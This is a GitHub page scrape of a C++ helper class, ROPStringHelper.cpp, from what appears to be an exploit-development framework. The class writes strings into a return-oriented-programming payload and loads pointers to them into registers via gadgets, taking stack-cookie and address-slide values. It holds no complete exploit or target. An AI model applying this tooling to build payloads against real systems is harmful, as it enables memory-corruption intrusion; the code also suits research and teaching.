-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathROPStringHelper.cpp
executable file
·116 lines (94 loc) · 2.89 KB
/
ROPStringHelper.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
// ########################
// ropstringhelper.cpp
// ########################
#include "main.h"
//#include "GadgetHelper.h"
#include "ROPStringHelper.h"
ROPStringHelper::ROPStringHelper(uint cookieValue, uint slideValue,
const char* fileName, uint maxSize) :
GadgetHelper(cookieValue, slideValue, fileName, maxSize) {
// strings will be written onto the stack,
// after all the gadgets
// need to estimate total gadget size below
_last_s_offset = 0;
}
// clears r0 (tofix)
// store string on stack with r pointing to it
// return: string 1 pos
uint ROPStringHelper::mov_r_str_helper(const char* str1,
BYTE setToBeginning /* = FALSE */) {
uint s1_size = strlen(str1);
int s1_pos; // can be negative
if (DEBUG_PAYLOAD)
printf("%s\n", __FUNCTION__);
// switching back and forth for the string location doesn't work
// todo
setToBeginning = FALSE;
if (!setToBeginning) {
if (!_last_s_offset) {
// store at the end of the payload
_last_s_offset = getMaxROPSize() - s1_size - 4;
}
else {
// use 4 bytes because of the set to 0
_last_s_offset -= s1_size + 4;
}
}
else {
// feature not tested (todo)
if (!_last_s_offset) {
// store at the end of the payload
_last_s_offset = 0 + 0x28;
}
else {
_last_s_offset += s1_size + 4;
}
}
// store strings at 65%
// _last_s_offset = getMaxROPSize() -
// (getMaxROPSize() / 10 * 3.5);
// _last_s_offset = getMaxROPSize() -
// (getMaxROPSize() / 10 * 2.6);
// load string below PC
// _last_s_offset = -50;
// printf("[0x%x] [%d] [0x%x]\n", getInitialPC(), _last_s_offset, _payload);
// memcpy((int*)getInitialPC() + _last_s_offset, str1, s1_size);
if (!areZerosAllowed()) {
memcpy(getPayload() + _last_s_offset, str1, s1_size);
}
else {
BYTE *str_offset = getPayload() + _last_s_offset;
strncpy((char*)str_offset, str1, s1_size);
*(str_offset + s1_size) = 0;
}
s1_pos = _last_s_offset - getPCLoc() - 0x28;
if (DEBUG)
printf("mov_r_str: s1_pos: %d, s1_size: %d, "
"last_offset: %d, maxROP: %d (0x%x)\n",
s1_pos, s1_size, _last_s_offset,
getMaxROPSize(), getMaxROPSize());
if (!areZerosAllowed()) {
// set a 0, with gadgets, to the end of the string
// clears r0, r1 and r4 (tofix)
str_0_sp_x(s1_pos + s1_size);
}
return s1_pos;
}
void ROPStringHelper::mov_r_str(uint reg, const char* str1, BYTE setToBeginning /* = FALSE */) {
// clears r0, r1 and r4
uint s1_pos = mov_r_str_helper(str1, setToBeginning);
// clears r4
mov_r_sp_x(reg, s1_pos);
}
void ROPStringHelper::r0_str1__r1_str2(const char* str1,
const char* str2,
BYTE setToBeginning /* = FALSE */) {
if (DEBUG_PAYLOAD)
printf("%s\n", __FUNCTION__);
// clears r0, r1 and r4
uint s1_pos = mov_r_str_helper(str1, setToBeginning);
uint s2_pos = mov_r_str_helper(str2, setToBeginning);
// clears r4 and r0
mov_r_sp_x(1, s2_pos);
mov_r_sp_x(0, s1_pos);
}